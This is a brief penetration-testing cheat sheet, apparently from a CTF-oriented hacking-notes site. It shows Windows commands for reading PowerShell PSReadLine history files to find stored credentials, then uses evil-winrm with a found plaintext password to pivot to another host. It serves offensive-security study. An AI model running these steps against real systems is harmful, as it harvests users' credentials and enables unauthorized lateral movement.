>_ shadow.red
notatki-hakera.pl YouTube CTF Solutions Channel ☕ Buy me a coffee
~ / Privilege Escalation / PowerShell History Hunting

PowerShell History Hunting

Privilege Escalation Windows Credentials windows

Show current user’s history

Get-History
(Get-PSReadlineOption).HistorySavePath
type C:\Users\dave\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

Cross-user via env

powershell -c type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

Pivot using found credentials (example)

evil-winrm -i 192.168.50.220 -u daveadmin -p "qwertqwertqwert123\!\!"